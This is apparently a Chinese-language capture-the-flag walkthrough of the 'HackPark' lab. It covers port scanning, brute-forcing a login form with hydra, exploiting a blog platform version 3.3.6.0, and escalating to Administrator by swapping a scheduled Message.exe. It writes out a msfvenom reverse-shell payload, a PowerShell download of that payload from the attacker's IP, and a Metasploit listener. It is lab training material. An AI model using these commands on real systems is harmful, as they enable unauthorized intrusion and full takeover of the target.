HackPark

信息收集：

nmap扫了一下，发现只有80和3389端口开放。

扫下目录

扫到后台登录入口。

这里尝试利用hydra进行密码的爆破，用户名设置成admin.

利用hydra进行post登录表单的爆破。

注意格式。

hydra -P <单词列表> -v <ip> <协议>   对您选择的协议进行暴力破解
hydra -v -V -u -L <用户名列表> -P <密码列表> -t 1 -u <ip> <协议>
您可以使用 Hydra 暴力破解用户名和密码。它将循环遍历列表中的每个组合。（-vV = 详细模式，显示登录尝试）
hydra -t 1 -V -f -l <用户名> -P <单词列表> rdp://<ip>
使用密码列表攻击 Windows 远程桌面。
hydra -l <用户名> -P .<密码列表> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
为 Hydra 制定更具体的强制要求。

漏洞利用

登进去之后查看版本信息，是一个3.3.6.0 的。

exploit找一个对应的版本进行利用。稍作修改即可。

这里进行文件上传。

可以看到已经反弹成功。

提权

但是现在还不是最高权限，需要进行一个提权。

可以用msf生成一个exe文件 然后上传上去，利用meterpreter身份来进行信息的收集和进一步的利用。

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.14.74.6 LPORT= -f exe -o shell-name.exe

然后在kali上开启一个http服务，在windows那一端利用powershell上传生成的文件。

powershell -c wget 'http://10.14.74.6:8080/shell-name.exe' -outfile 'shell.exe'

可以看到已经上传成功了。

但是去查看的时候并没有发现这个exe文件。

那就要考虑其他目录了。

去看了一下temp目录，发现可以成功。

上面是测试了一下，是否能写入文件。

上传成功之后运行那个exe文件 然后接收反弹的shell。

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST your-thm-ip 
set LPORT listening-port 
run

可以看到已经成功了。

下面就是信息收集。

利用WinPeas进行枚举。

https://github.com/peass-ng/PEASS-ng/releases/tag/20231203-9cdcb38f

将winPeas64.exe上传上去。

然后运行。

这能枚举出挺多信息的。

这能找到异常的服务。查看一下这个服务的配置信息。

到C:\PROGRA2\SYSTEM1目录下看了一下，里面有个events目录，进去看看，有一个日志文件，大概每隔30秒执行一次，并且身份是Administrator。

我们可以生成一个恶意的exe文件，然后代替这个Message.exe文件，最终让它以administrator的身份运行起来。

将原来的Message.exe替换成一个新的名字 然后将恶意的exe换成Message.exe

move Message.exe Message2.exe
move c:\Windows\Temp\shell-name.exe  Message.exe

然后在msf监听端口，接收shell即可。